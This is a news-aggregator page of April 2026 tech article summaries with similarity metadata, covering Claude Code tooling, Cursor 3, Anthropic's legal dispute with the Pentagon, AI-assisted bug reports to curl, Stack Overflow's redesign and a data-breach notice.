IT hiring via Claude Code in 2026: I wrote an AI agent that applies to job postings for you |
habr_ai |
06.04.2026 14:22 |
0.679
|
| Embedding sim. | 0.7759 |
| Entity overlap | 0.3333 |
| Title sim. | 0.1339 |
| Time proximity | 0.8093 |
| NLP type | other |
| NLP organization | |
| NLP topic | ai agents |
| NLP country | |
Open original
IT hiring in 2026 means 6-8 interview rounds and take-home tasks that eat 3 days. In response, someone wrote an AI agent on Claude Code that scrapes 45 job boards, tailors a resume for every application, and preps you for interviews. I break down the architecture, what actually works, and why mass automated applications are most likely a bad idea.
Read more
|
|
|
One AI head is good, but two from different vendors are better: how to make Claude and Codex argue with each other |
habr_ai |
05.04.2026 12:17 |
0.676
|
| Embedding sim. | 0.8019 |
| Entity overlap | 0.2941 |
| Title sim. | 0.176 |
| Time proximity | 0.4873 |
| NLP type | product_launch |
| NLP organization | OpenAI |
| NLP topic | software development |
| NLP country | |
Open original
OpenAI recently released an open-source plugin that gives Claude Code a structured integration with Codex. It all works right from VS Code through the Claude Code Extension. In my experience, even on tasks unrelated to code, two "AI heads" produce better results than one. A lone AI has no incentive to challenge its own conclusions, and it is limited by its training. Managing the interplay of two AIs used to be awkward, though. The new plugin makes it easier, and extra skills for Claude Code make it easier still. Below: the skills that turn AI advisers into structured opponents.
Until I figured out how to use the plugin effectively, I was getting dialogues like this:
Read more
|
|
|
Claude Code for those who don't write code: a full breakdown |
habr_ai |
31.03.2026 17:49 |
0.671
|
| Embedding sim. | 0.7492 |
| Entity overlap | 0.25 |
| Title sim. | 0.1563 |
| Time proximity | 0.9773 |
| NLP type | other |
| NLP organization | |
| NLP topic | developer tools |
| NLP country | |
Open original
Hi there! Today we'll talk about Claude Code and how to use it if you're not a developer. Not because it's "revolutionary" or "the AI of the future", but because it genuinely handles tasks that used to take hours.
The article will be useful to product managers, marketers, founders, and designers: anyone who works on products and wants to get more done in less time. Developers too, but plenty of people already write for you.
This is not a call to drop your favorite tool and rush to buy a new one. But if you use AI every day, feel that something is missing, and want higher-quality results on your tasks, this thing can cover more of them, faster and better.
Read more
|
|
|
Amazon rejects AWS climate disclosure proposal |
the_register_ai |
10.04.2026 12:33 |
0.665
|
| Embedding sim. | 0.7939 |
| Entity overlap | 0.0385 |
| Title sim. | 0.0505 |
| Time proximity | 0.7732 |
| NLP type | regulation |
| NLP organization | Amazon |
| NLP topic | ai infrastructure |
| NLP country | United States |
Open original
PaaS + IaaS
Amazon would rather shareholders did not look too closely at carbon footprint
Investors urged to reject proposal for more disclosure on whether AWS expansion risks climate goals
Dan Robinson
Fri 10 Apr 2026 // 12:33 UTC
Amazon's board of directors is urging shareholders to reject a proposal that would have the megacorp disclose more information on the impact of datacenters on its climate commitments.
The proposal is one of several shareholder suggestions in the online bazaar's proxy statement [PDF], sent to all shareholders ahead of its annual meeting next month.
It notes that Amazon has made high-profile climate commitments central to its corporate strategy, but also that the firm's cloud business aims to massively expand its infrastructure over the next several years. This calls into question whether the original commitment is realistic.
This proposal was submitted by Brian Kariger, represented by As You Sow, a nonprofit that advocates corporate responsibility, and Mercy Investment Services, the investor arm of the Sisters of Mercy of the Americas.
With its Climate Pledge, Amazon committed to "net-zero carbon emissions by 2040" and match 100 percent of its electricity use with renewable energy by 2030, the proposal says.
While Amazon claims to have met the latter commitment in 2023, the shareholders behind the proposal question whether the company will be able to maintain this in the coming years, given the huge datacenter expansion planned by its Amazon Web Services (AWS) cloud division.
Earlier this year, CEO Andy Jassy told investors that Amazon had added 3.9 gigawatts of compute capacity during 2025, and he expects to double that by the end of 2027, spending $200 billion on infrastructure during 2026. That's more than the entire gross domestic product of some mid-sized national economies, according to statistics available from the IMF .
All of that extra infrastructure needs power, and the proposal notes that utilities in states such as Virginia – the datacenter capital of the world – now have to build new gas-powered generator plants to meet the growing demand, or even keep coal-fired facilities online . All of this is pumping millions of tons of extra greenhouse gases into the atmosphere.
As a result, Amazon faces questions over how it intends to deliver on its climate promises. The company relies heavily on renewable energy credits (RECs), according to the proposal, which asks whether the volume purchased will increase and whether enough will be available. Amazon's investors would benefit from analysis that explains how the company will tackle those concerns, it states.
As The Register has previously reported, hyperscalers are not being entirely transparent about their carbon footprint, and AWS was accused of being the worst offender.
Amazon's board of directors recommends that shareholders vote against the proposal for more detailed reporting on the impact of datacenters on its climate commitments.
We asked Amazon why it is urging shareholders to reject the proposal and whether it believes existing disclosures are sufficient to reassure investors.
Instead, a spokesperson simply referred us to the board's response in the proxy statement, which essentially says Amazon believes the report requested in the proposal is unnecessary.
"We already provide regular, public updates on our progress, initiatives, and work in pursuit of our climate goals, including routinely reporting on our carbon intensity and on our efforts to reduce the carbon footprint of AI workloads and make our datacenters more sustainable and efficient," the text says.
"As a result, our current public reporting already addresses the specific challenges highlighted by this proposal and makes the report requested in the proposal unnecessary."
Last year, AWS was part of a body of datacenter operators that published a report critical of the EU's plans to introduce minimum performance standards for the sustainability of server farms. ®
More about
Amazon
AWS
Datacenter
More like these
×
More about
Amazon
AWS
Datacenter
Environment
Narrower topics
Amazon Bedrock
Aurora
AWS Graviton
Disaster recovery
Ebook
EC2
Kindle
Open Compute Project
PUE
Renewables
S3
Software defined data center
Broader topics
Cloud Computing
Jeff Bezos
|
|
|
Working with Claude Code on the desktop from Russia |
habr_ai |
09.04.2026 13:01 |
0.662
|
| Embedding sim. | 0.7688 |
| Entity overlap | 0.4 |
| Title sim. | 0.0469 |
| Time proximity | 0.7486 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | developer tools |
| NLP country | |
Open original
Recently, fed up with Cursor's microscopic limits (an otherwise excellent tool!) on access to Anthropic's frontier models, I wanted to get them on flat-rate plans straight from the vendor. These are plans with monthly or yearly billing rather than per-request API pricing.
Asking for advice online, I ran into the arrogance and snobbery of those who had managed to set everything up. Since I needed a paid plan, I did not want to take risks: there are persistent rumors that even paying users' plans get blocked without a refund if the service is used from certain countries.
In the end I got everything set up: Claude works like a native, and this article covers my experience, plus tests of different VPS locations.
I will describe the setup for a Linux desktop, with a bonus Windows setup at the end.
Read more
|
|
|
How to find a job with an AI in 2026: 7 prompts that actually help you pass interviews |
habr_ai |
08.04.2026 05:54 |
0.654
|
| Embedding sim. | 0.7736 |
| Entity overlap | 0 |
| Title sim. | 0.1026 |
| Time proximity | 0.7647 |
| NLP type | other |
| NLP organization | |
| NLP topic | generative ai |
| NLP country | |
Open original
75% of resumes are screened out by ATS filters before a recruiter ever sees them. I collected 7 AI prompts that cover the entire job-search cycle: from rewriting a resume for a specific vacancy to interview prep and follow-up. Tested on myself; works with Claude, ChatGPT, and Gemini.
Read more
|
|
|
Anthropic essentially bans OpenClaw from Claude by making subscribers pay extra |
the_verge_ai |
03.04.2026 23:52 |
0.651
|
| Embedding sim. | 0.765 |
| Entity overlap | 0.1111 |
| Title sim. | 0.24 |
| Time proximity | 0.5307 |
| NLP type | regulation |
| NLP organization | Anthropic |
| NLP topic | enterprise ai |
| NLP country | |
Open original
Using OpenClaw with Claude AI is about to get a lot more expensive, thanks to Anthropic's new policy changes. Beginning April 4th at 3PM ET, users will "no longer be able to use your Claude subscription limits for third-party harnesses including OpenClaw," according to an email sent to users on Friday evening. Instead, if users want to use OpenClaw with Claude, they'll have to use a "pay-as-you-go option" that will be billed separately from their Claude subscription.
With OpenClaw creator Peter Steinberger now employed by OpenAI, Anthropic may also be encouraging subscribers to use more of its own tools, like Claude Cowork, instead. Steinber …
Read the full story at The Verge.
|
|
|
Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex |
wired |
02.04.2026 17:00 |
0.647
|
| Embedding sim. | 0.7205 |
| Entity overlap | 0.1923 |
| Title sim. | 0.3093 |
| Time proximity | 0.7465 |
| NLP type | product_launch |
| NLP organization | Cursor |
| NLP topic | software development |
| NLP country | United States |
Open original
Maxwell Zeff
Apr 2, 2026 1:00 PM
As Cursor launches the next generation of its product, the AI coding startup has to compete with OpenAI and Anthropic more directly than ever.
Cursor announced Thursday the launch of Cursor 3, a new product interface that allows users to spin up AI coding agents to complete tasks on their behalf. The product, which was developed under the code name Glass, is Cursor’s response to agentic coding tools like Anthropic’s Claude Code and OpenAI’s Codex, which have taken off with millions of developers in recent months.
“In the last few months, our profession has completely changed,” said Jonas Nelle, one of Cursor’s heads of engineering, in an interview with WIRED. “A lot of the product that got Cursor here is not as important going forward anymore.”
Cursor increasingly finds itself in competition with leading AI labs for developers and enterprise customers. The company pioneered one of the first and most popular ways for developers to code with AI models from OpenAI, Anthropic, and Google—making Cursor one of these companies’ biggest AI customers. But in the last 18 months, OpenAI and Anthropic have launched agentic coding products of their own, and started offering them through highly subsidized subscriptions that have put pressure on Cursor’s business.
While Cursor’s core product lets developers code in an integrated development environment (IDE) and tap an AI model for help, new products like Claude Code and Codex center around allowing developers to off-load entire tasks to an AI agent—sometimes spinning up multiple agents at the same time. Cursor 3 is the startup’s version of an “agent-first” coding product. According to Nelle, the product is optimized for a world where developers spend their days “conversing with different agents, checking in on them, and seeing the work that they did,” rather than writing code themselves.
Cursor is launching its new agentic coding interface inside its existing desktop app, where it will live alongside the IDE. At the center of a new window in Cursor, there's a text box where users can type, in natural language, a task they'd like an AI agent to complete—it looks more like a chatbot than a coding environment. Press enter, and the AI agent sets to work without requiring the developer to write a single line of code. In a sidebar on the left, developers can view and manage all of the AI agents they have running in Cursor.
What’s unique about Cursor 3, compared to desktop apps for Claude Code and Codex, is that it integrates an agent-first product with Cursor’s AI-powered development environment. In a demo, Cursor’s other cohead of engineering for Cursor 3, Alexi Robbins, showed WIRED how users can prompt an agent in the cloud to spin up a feature, and then review the code it generated locally on their computer.
Nelle and Robbins argue it doesn’t matter which interface developers are spending their time in—they just want people using Cursor.
Competing With the AI Labs
I visited Cursor's office in San Francisco's North Beach neighborhood last week. The startup is reportedly raising fresh capital at a $50 billion valuation, nearly double what it was valued at in a funding round last fall, and has expanded into an old movie theater. Cursor employees used to toss their shoes in a pile by the door upon entry, but now there's a row of large shoe racks, signaling one way in which the company is growing up.
Yet Cursor still feels like a startup. Employees tell me that’s part of the appeal of working there; the company can ship quickly and doesn't feel too corporate. But as it finds itself racing to catch up to Anthropic and OpenAI in the agentic coding race, that scrappiness may not be enough. This battle—the one to create the best AI coding agent—may be Cursor’s most capital-intensive chapter yet.
Several developers tell WIRED that they’ve shifted most of their AI coding work to Claude Code and Codex, and away from Cursor. A large reason is the aforementioned subsidized subscriptions. WIRED has previously reported that Claude Code and Codex users can get well over $1000 worth of usage for their $200-a-month plans.
Ronald Mannak, founder of the startup Pico AI—which makes AI tools for Apple developers—says he’s largely shifted from using Cursor and Windsurf to agent-first products like Claude Code and Codex. He says his decision is largely driven by whichever tool has the most generous rate limit. Jack Crawford, cofounder of the AI memory startup mVara, says he rarely ever uses Cursor or Windsurf anymore, despite heavily using those tools last year. He now goes to Claude Code because of the value of the subscription.
Cursor offered a heavily subsidized subscription plan for its AI coding tool until June 2025, when the startup announced it would start charging developers through usage-based pricing. This upset developers at the time, but was part of an effort by the young startup to improve its margins and build a more sustainable business. OpenAI and Anthropic have raised tens of billions of dollars more than Cursor, so they can afford to keep spending heavily on customer acquisition (though Anthropic is starting to adjust its rate limits for Claude Code subscriptions). But Cursor says it has other strategies to compete with the leading AI labs.
Cursor has also started training in-house AI models that it can cost-effectively serve to customers. The startup recently launched Composer 2, an AI model based on an open-source system from the Chinese AI lab Moonshot AI, that Cursor did additional pretraining and post-training on. Nelle tells me people usually pick AI models in Cursor based on some combination of performance, price, and speed—and he argues that Composer 2 is competitive on those fronts. Cursor says it plans to train future Composer models completely from scratch.
But training AI models is quite an expensive undertaking. Cursor has historically done well doing more with less, though the AI coding race is now heating up. OpenAI and Anthropic have recognized how large the business around these tools could be and are investing in them heavily. A lot of these companies are also converging on similar products, in which agents are taking on more and more of a developer’s workload. In the agent-first world, it’s hard to imagine how Cursor can stay competitive without raising significantly more capital—and fast.
This is an edition of Maxwell Zeff’s Model Behavior newsletter . Read previous newsletters here.
|
|
|
Configuring Claude Code: spinner easter eggs and the hidden settings.json and CLAUDE.md options the documentation doesn't mention |
habr_ai |
10.04.2026 08:15 |
0.646
|
| Embedding sim. | 0.7355 |
| Entity overlap | 0.1667 |
| Title sim. | 0.124 |
| Time proximity | 0.8855 |
| NLP type | other |
| NLP organization | Anthropic |
| NLP topic | developer tools |
| NLP country | |
Open original
While Claude Code thinks, the terminal flashes Noodling, Honking, Clauding: 56 easter-egg words from a system known inside Anthropic as Tengu. But that is just the tip of the iceberg. I collected everything you can configure: spinnerVerbs, CLAUDE.md as memory between sessions, permissions to protect .env, auto-formatting via hooks, LSP navigation, and three working modes via Shift+Tab. A ready-to-paste config is inside.
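The knobs listed above could be sketched as a settings.json fragment. This is an assumption-heavy sketch, not an official config: spinnerVerbs and the .env protection come from the post itself, the permissions/hooks shape follows common Claude Code settings conventions, and the prettier command is purely illustrative. Verify every field name against the current documentation before use.

```json
{
  "spinnerVerbs": ["Noodling", "Honking", "Clauding"],
  "permissions": {
    "deny": ["Read(./.env)", "Read(./.env.*)"]
  },
  "hooks": {
    "PostToolUse": [
      {
        "matcher": "Edit|Write",
        "hooks": [{ "type": "command", "command": "npx prettier --write ." }]
      }
    ]
  }
}
```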
Read more
|
|
|
Conflicting Rulings Leave Anthropic in ‘Supply-Chain Risk’ Limbo |
wired |
08.04.2026 22:27 |
0.641
|
| Embedding sim. | 0.7478 |
| Entity overlap | 0.16 |
| Title sim. | 0.1354 |
| Time proximity | 0.6974 |
| NLP type | lawsuit |
| NLP organization | Anthropic |
| NLP topic | ai regulation |
| NLP country | United States |
Open original
Paresh Dave
Apr 8, 2026 6:27 PM
A US appeals court ruling is at odds with a separate, lower court decision from March, leaving uncertainty about if and how the US military can use the AI company's Claude model.
Anthropic “has not satisfied the stringent requirements” to temporarily lose the supply-chain-risk designation imposed by the Pentagon, a US appeals court in Washington, DC, ruled on Wednesday. The decision is at odds with one issued last month by a lower court judge in San Francisco, and it wasn’t immediately clear how the conflicting preliminary judgments would be resolved.
The government sanctioned Anthropic under two different supply-chain laws with similar effects, and the San Francisco and Washington, DC, courts are each ruling on only one of them. Anthropic has said it is the first US company to be designated under the two laws, which are typically used to punish foreign businesses that pose a risk to national security.
“Granting a stay would force the United States military to prolong its dealings with an unwanted vendor of critical AI services in the middle of a significant ongoing military conflict,” the three-judge appellate panel wrote on Wednesday in what they described as an unprecedented case. The panel said that while Anthropic may suffer financial harm from the ongoing designation, they did not want to risk “a substantial judicial imposition on military operations” or “lightly override” the military’s judgments on national security.
The San Francisco judge had found that the Department of Defense likely acted in bad faith against Anthropic, driven by frustration over the AI company’s proposed limits on how its technology could be used and its public criticism of those restrictions. The judge ordered the supply-chain risk label removed last week, and the Trump administration complied by restoring access to Anthropic AI tools inside the Pentagon and throughout the rest of the federal government.
Anthropic spokesperson Danielle Cohen says the company is grateful the Washington, DC, court “recognized these issues need to be resolved quickly” and remains confident “the courts will ultimately agree that these supply chain designations were unlawful.”
The Department of Defense did not immediately respond to a request for comment, but acting attorney general Todd Blanche posted a statement on X. “Today’s DC Circuit stay allowing the government to designate Anthropic as a supply-chain risk is a resounding victory for military readiness,” he wrote.
“Our position has been clear from the start—our military needs full access to Anthropic’s models if its technology is integrated into our sensitive systems.
Military authority and operational control belong to the Commander-in-Chief and Department of War, not a tech company.”
The cases are testing how much power the executive branch has over the conduct of tech companies. The battle between Anthropic and the Trump administration is also playing out as the Pentagon deploys AI in its war against Iran. The company has argued it is being illegally punished for insisting that its AI tool Claude lacks the accuracy needed for certain sensitive operations such as carrying out deadly drone strikes without human supervision.
Several experts in government contracting and corporate rights have told WIRED that Anthropic has a strong case against the government, but the courts sometimes refuse to overrule the White House on matters related to national security. Some AI researchers have said the Pentagon's action against Anthropic "chills professional debate" about the performance of AI systems.
Anthropic has claimed in court that it lost business because of the designation, which government lawyers contend bars the Pentagon and its contractors from using the company's Claude AI as part of military projects. And as long as Trump remains in power, Anthropic may not be able to regain the significant foothold it held in the federal government.
Final decisions in the company’s two lawsuits could be months away. The Washington court is scheduled to hear oral arguments on May 19.
The parties have revealed minimal details so far about how exactly the Department of Defense has used Claude or how much progress it has made in transitioning staff to other AI tools from Google DeepMind, OpenAI, or others. The military, which under President Trump calls itself the Department of War, has said it has taken steps to ensure Anthropic can't purposely try to sabotage its AI tools during the transition.
Update 4/8/26 7:27 EDT: This story has been updated to include a statement from acting attorney general Todd Blanche.
|
|
|
PromptPilot: a task scheduler for Claude Code, Codex, and other AI CLIs |
habr_ai |
03.04.2026 11:16 |
0.636
|
| Embedding sim. | 0.7329 |
| Entity overlap | 0.2105 |
| Title sim. | 0.1158 |
| Time proximity | 0.7791 |
| NLP type | product_launch |
| NLP organization | PromptPilot |
| NLP topic | developer tools |
| NLP country | |
Open original
"Everything, Lucilius, belongs to others; time alone is ours." Seneca, Letters to Lucilius, I, 3.
With AI subscriptions this is literal: token quotas, request limits, and reset "windows" are not yours; the provider sets them. What remains is what you can control yourself: when to send a task, in what order to run it, and where you happen to be at that moment, whether at your desk, in a taxi, or already in bed.
I built PromptPilot, a prompt queue for AI CLIs (Claude Code, Codex, Qwen): tasks are submitted from the terminal, a web UI, or a Telegram bot, and a worker runs them one by one, with scheduling, priorities, and retries on rate limits. The idea is simple: instead of watching the limit with your own eyes, lay the work out in advance so that by the time you actually sit down to code, the result is already at hand, or so that the session "warm-up" happens without you at the monitor at five in the morning.
Below: why anyone besides me might need this, how the architecture works on SQLite and three processes, and how to reply to the model mid-dialogue from the bot without opening a terminal. If you recognize yourself in the stories about burning tokens and nightly limit deadlines, welcome to the comments.
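The queue described above (SQLite storage, priorities, retrying after a rate limit) can be sketched in a few lines. This is a minimal illustration of the idea, not PromptPilot's actual code; the schema and function names are invented for the example.

```python
import sqlite3
import time

def init_db(conn):
    # One table is enough for the sketch: a prompt, a priority, a status,
    # and a timestamp before which a deferred task must not run.
    conn.execute("""CREATE TABLE IF NOT EXISTS tasks (
        id INTEGER PRIMARY KEY,
        prompt TEXT NOT NULL,
        priority INTEGER DEFAULT 0,
        status TEXT DEFAULT 'pending',
        not_before REAL DEFAULT 0
    )""")

def enqueue(conn, prompt, priority=0):
    conn.execute("INSERT INTO tasks (prompt, priority) VALUES (?, ?)",
                 (prompt, priority))
    conn.commit()

def next_task(conn):
    # The worker pops the highest-priority runnable task, oldest first.
    return conn.execute(
        "SELECT id, prompt FROM tasks WHERE status = 'pending' "
        "AND not_before <= ? ORDER BY priority DESC, id LIMIT 1",
        (time.time(),)).fetchone()

def complete(conn, task_id):
    conn.execute("UPDATE tasks SET status = 'done' WHERE id = ?", (task_id,))
    conn.commit()

def defer(conn, task_id, delay_s):
    # On a rate-limit error, push the task past the provider's reset window
    # instead of dropping it.
    conn.execute("UPDATE tasks SET not_before = ? WHERE id = ?",
                 (time.time() + delay_s, task_id))
    conn.commit()

conn = sqlite3.connect(":memory:")
init_db(conn)
enqueue(conn, "refactor module A", priority=1)
enqueue(conn, "warm up session", priority=5)
task = next_task(conn)   # highest-priority task comes back first
complete(conn, task[0])
```

A real multi-process setup would put the database in a file and rely on SQLite's locking, but the scheduling logic stays this simple.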
Read more
|
|
|
AI slop got better, so now maintainers have more work |
the_register_ai |
06.04.2026 22:16 |
0.635
|
| Embedding sim. | 0.7278 |
| Entity overlap | 0.0476 |
| Title sim. | 0.0667 |
| Time proximity | 0.9892 |
| NLP type | other |
| NLP organization | curl |
| NLP topic | software engineering |
| NLP country | |
Open original
Once AI bug reports become plausible, someone still has to verify them
Thomas Claburn
Mon 6 Apr 2026 //
22:16 UTC
If AI does more of the work but humans still have to check it, you need more reviewers. Now that AI models have gotten better at writing and evaluating code, open-source projects find themselves overwhelmed with the too-good-to-ignore output.
For the curl project, that has meant less AI slop and more demand upon maintainers who have to evaluate more plausible vulnerability reports.
"Over the last few months, we have stopped getting AI slop security reports in the curl project," said Daniel Stenberg, founder and lead developer of curl, in a social media post . "They're gone. Instead, we get an ever-increasing amount of really good security reports, almost all done with the help of AI."
The reports, said Stenberg, are being submitted faster than ever before and are imposing a growing workload on maintainers.
According to Stenberg, the situation is similar for other open source maintainers.
Linux kernel maintainer Greg Kroah-Hartman recently noted how AI-assisted bug reports contained less slop and more valid concerns. He said that the Linux team has been trying to deal with the increased volume, but implied that smaller teams might be struggling.
Even if the reports are better, the issues being identified aren't necessarily security flaws that can be exploited and need to be corrected. As evidence, Stenberg points to curl's public list of closed reports . Most of the reports have been closed because the issue isn't a serious threat, even if it might be something worth correcting.
For example, a data race in a curl library was initially discussed as an issue that might get a CVE. But it was eventually fixed in a pull request , with the bug deemed to be simply "informative."
Stenberg, back in 2024, called out the problem of AI slop bug reports and, earlier this year, went so far as to stop paying awards for curl vulnerability reports. His goal was to remove the incentive to submit erroneous or unsubstantiated reports, whether those came from automated systems designed to maximize financial gain while minimizing effort or from people using AI tools who shirked their obligation to check the AI's work.
Other organizations have taken similar steps, most recently the Internet Bug Bounty program, which said it would stop issuing monetary awards for vulnerabilities at the end of March.
"The discovery landscape is changing," the program maintainers said in an announcement that also shuttered the Node.js vulnerability award program . "AI-assisted research is expanding vulnerability discovery across the ecosystem, increasing both coverage and speed. The balance between findings and remediation capacity in open source has substantively shifted. We have a responsibility to the community to ensure this program effectively accomplishes its ambitious dual purpose: discovery and remediation. Accordingly, we are pausing submissions while we consider the structure and incentives needed to further these goals."
Linux maintainer Willy Tarreau responded to Stenberg's post by noting that the Linux kernel team has had a similar experience to those working on curl. He argues that more needs to be asked of those making bug reports.
"It's time to update the reporting rules to reduce the overhead by making the LLM+reporter do a larger share of the work to reduce the time spent triaging," he said.
Capable AI tooling doesn't increase the capabilities of the humans in the loop. Much of the notional productivity gain from AI may just be AI tool users moving the cost of code review off the books. ®
|
|
|
Can JavaScript Escape a CSP Meta Tag Inside an Iframe? |
simon_willison |
03.04.2026 16:05 |
0.634
|
| Embedding sim. | 0.7414 |
| Entity overlap | 0.0769 |
| Title sim. | 0.0385 |
| Time proximity | 0.866 |
| NLP type | other |
| NLP organization | |
| NLP topic | cybersecurity |
| NLP country | |
Open original
Research: Can JavaScript Escape a CSP Meta Tag Inside an Iframe?
In trying to build my own version of Claude Artifacts I got curious about options for applying CSP headers to content in sandboxed iframes without using a separate domain to host the files. Turns out you can inject <meta http-equiv="Content-Security-Policy"...> tags at the top of the iframe content and they'll be obeyed even if subsequent untrusted JavaScript tries to manipulate them.
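The injection order is the whole trick: the CSP meta tag has to be parsed before any untrusted markup, because the policy only governs content encountered after it. A minimal sketch of assembling such a srcdoc (string assembly only; enforcement happens in the browser, and the policy value is illustrative):

```python
import html

# Illustrative policy: inline scripts may run, but connect-src falls back to
# default-src 'none', so network requests from the iframe are blocked.
CSP = "default-src 'none'; script-src 'unsafe-inline'"

def make_srcdoc(untrusted_html: str) -> str:
    # The CSP <meta> tag is placed before any untrusted content so the
    # policy is already active when the untrusted markup is parsed.
    return (
        "<!DOCTYPE html><html><head>"
        f'<meta http-equiv="Content-Security-Policy" content="{CSP}">'
        "</head><body>"
        f"{untrusted_html}"
        "</body></html>"
    )

def iframe_tag(untrusted_html: str) -> str:
    # srcdoc is an HTML attribute, so the inner document must be
    # attribute-escaped when embedded in the parent page.
    inner = html.escape(make_srcdoc(untrusted_html))
    return f'<iframe sandbox="allow-scripts" srcdoc="{inner}"></iframe>'

doc = make_srcdoc("<script>fetch('https://example.invalid')</script>")
# The meta tag precedes the untrusted script in the generated document.
assert doc.index("Content-Security-Policy") < doc.index("<script>")
```

Note that meta-delivered CSP supports fewer directives than the HTTP header (frame-ancestors and sandbox, for instance, are header-only).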
Tags: iframes, security, javascript, content-security-policy, sandboxing
|
|
|
Stack Overflow abandons redesign beta after criticism |
the_register_ai |
07.04.2026 16:26 |
0.631
|
| Embedding sim. | 0.7197 |
| Entity overlap | 0.2 |
| Title sim. | 0.0842 |
| Time proximity | 0.8919 |
| NLP type | other |
| NLP organization | Stack Overflow |
| NLP topic | developer tools |
| NLP country | |
Open original
Stack Overflow abandons redesign after loyalists criticize it
Fabled Q&A site for devs struggles with its future as AI takes over its original purpose
Tim Anderson
Tue 7 Apr 2026 //
16:26 UTC
Stack Overflow, the once-popular dev community, has abandoned a planned redesign that was meant to refocus the site more on discussions than the question-and-answer format that built its reputation.
Philippe Beaudette, VP community, announced the change in a post last week.
"We will be retiring the beta shortly and will be removing the button to get to it and ceasing support for it," he said.
The beta garnered negative feedback from the Stack Overflow community, including observations that it looked more like a general discussion site such as Reddit and was losing the essence of what made it successful: precise questions and community-validated answers.
Once the favored destination for developers stuck with a coding problem, Stack Overflow has seen its traffic dwindle thanks to AI-driven answers surfaced directly in IDEs (integrated development environments).
The Stack Overflow beta site redesign, now abandoned
The beta design changes were not just visual. When it was launched in February, the company stated that "we plan to retire certain curation workflows, such as close votes and most review queues," a huge change for a site known for its tendency to reject questions for being duplicates, off-topic, or unclear. That tendency has also fed a reputation for being hostile to newcomers, causing a further decline in traffic.
The Stack Overflow community disliked that a changed visual design was munged together with a different moderation policy. "Burying this fundamental aspect of how the site works half way through a post that claims to be about 'new site design' - with an implication that it's mostly cosmetic - feels like you know it's going to be unpopular, and were trying to hide it," said one highly upvoted comment .
That said, the proposal to change curation of questions was not new. In December 2025, an official post said that "We propose a radical shift: stop closing questions and introduce a new curation model," while also observing that it was odd to be rejecting 40 to 50 percent of questions when so few are now being posted.
Stack Overflow has also experimented with what the site called "opinion-based questions," allowing users to tag questions with labels such as "best practice" or "general advice," rather than all questions having to be about a specific technical issue. This is now part of the main site and Beaudette said that "we will retain them as they currently are."
Beaudette said that the beta had been successful in "eliminating ideas that don't work" but the site is in a tough spot. The failure of its beta redesign highlights the barriers to change, while the decline in traffic shows that the old model no longer works as it once did.
Generative AI is vulnerable to mistakes and hallucinations, making a human-curated source of developer information particularly valuable.
It seems that Stack Overflow is uncertain what comes next. "We aren't 'changing our mind', exactly, because we had never settled on what would deploy," said Beaudette. ®
|
|
|
Data Breach Alert: Edelson Lechtzin LLP Investigates Figure Lending Corp. Data Breach Affecting Nearly 1 Million Users |
prnewswire |
10.04.2026 02:36 |
0.63
|
| Embedding sim. | 0.7338 |
| Entity overlap | 0.0455 |
| Title sim. | 0.0909 |
| Time proximity | 0.8325 |
| NLP type | other |
| NLP organization | Edelson Lechtzin LLP |
| NLP topic | data privacy |
| NLP country | United States |
Open original
News provided by
Edelson Lechtzin LLP
Apr 09, 2026, 22:36 ET
CHARLOTTE, N.C. , April 9, 2026 /PRNewswire/ -- Edelson Lechtzin LLP, a national class action law firm, is actively investigating data privacy claims arising from the Figure Lending Corp. data breach. On January 28, 2026, Figure Technology experienced an incident in which personal data was accessed via database queries involving loan and inquiry records.
Key Facts About Figure Lending Corp.
Figure Lending Corp. (d/b/a Figure) is a fintech firm using blockchain technology to offer quick home equity loans, refinancing, and crypto-backed lending services.
Figure Lending Corp. discovered that personal information was retrieved by querying company databases containing records of loans and loan inquiries.
Following an investigation, they discovered that certain personal data may have been acquired, including names, Social Security numbers, addresses, phone numbers, email addresses, dates of birth, loan account numbers, and loan information.
Are You Affected by the Figure Lending Corp. Data Breach?
If you received a data breach notification, you may be at increased risk of identity theft and fraud. Recommended steps include regularly reviewing account statements and monitoring credit reports for suspicious activity.
Our Investigation and Your Legal Options
Edelson Lechtzin LLP is investigating a class action seeking legal remedies for individuals whose sensitive personal data may have been compromised in the Figure Lending Corp. breach. We can help you evaluate your rights and potential claims at no cost.
Contact Us for a Free Case Evaluation
Speak confidentially with a data privacy attorney today: Marc Edelson, Esq., Edelson Lechtzin LLP, 411 S. State Street, Suite N-300, Newtown, PA 18940; Phone: 844-696-7492 ext. 2; Email: [email protected] ; Web: www.edelson-law.com . Or click HERE to request a free consultation.
Why Choose Edelson Lechtzin LLP
Edelson Lechtzin LLP is a national class action law firm with offices in Pennsylvania and California. Beyond data breach litigation, our attorneys handle class and collective actions involving securities and investment fraud, federal antitrust violations, ERISA employee benefit plans, wage theft, and consumer fraud.
Protect Yourself Now
Confirm whether your information was involved in the Figure Lending Corp. incident
Place fraud alerts and consider credit monitoring [if available]
Preserve any letters or emails you received about the breach
Contact our firm to discuss your legal options and next steps
Media and Partnership Inquiries: Use the contact information above to connect with our team regarding interviews, co-counsel opportunities, and referral partnerships.
Legal Notice: This press release may be considered Attorney Advertising in some jurisdictions.
SOURCE Edelson Lechtzin LLP
|
|
|
[Translation] 10 trillion parameters and a "too dangerous" label: what we know about Claude Mythos |
habr_ai |
01.04.2026 18:13 |
0.63
|
| Embedding sim. | 0.7144 |
| Entity overlap | 0 |
| Title sim. | 0.1346 |
| Time proximity | 0.9713 |
| NLP type | product_launch |
| NLP organization | Anthropic |
| NLP topic | large language models |
| NLP country | |
Open original
Claude Mythos is a new super-AI model that Anthropic is not yet ready to show you.
A leak suggests it far surpasses Opus 4.6, and may be too powerful for a public release.
This does not look like the usual AI model hype cycle: Anthropic accidentally left draft blog posts, internal documents, and nearly 3,000 unpublished items in a publicly accessible data cache.
They were discovered by two cybersecurity researchers.
The model is called Claude Mythos, and Anthropic's own words describe it as "by far the most powerful AI model we have ever developed."
Anthropic confirmed the leak: a company spokesperson called it a "qualitative leap" in AI performance and said that early-access customers are already testing the model.
So what is Claude Mythos, and how does it differ from the Opus and Sonnet models?
Read more
|
|
|
The Axios supply chain attack used individually targeted social engineering |
simon_willison |
03.04.2026 13:54 |
0.629
|
| Embedding sim. | 0.7239 |
| Entity overlap | 0.1429 |
| Title sim. | 0.075 |
| Time proximity | 0.8789 |
| NLP type | other |
| NLP organization | Axios |
| NLP topic | cybersecurity |
| NLP country | |
Open original
The Axios team have published a full postmortem on the supply chain attack which resulted in a malware dependency going out in a release the other day, and it involved a sophisticated social engineering campaign targeting one of their maintainers directly. Here's Jason Saayman's description of how that worked:
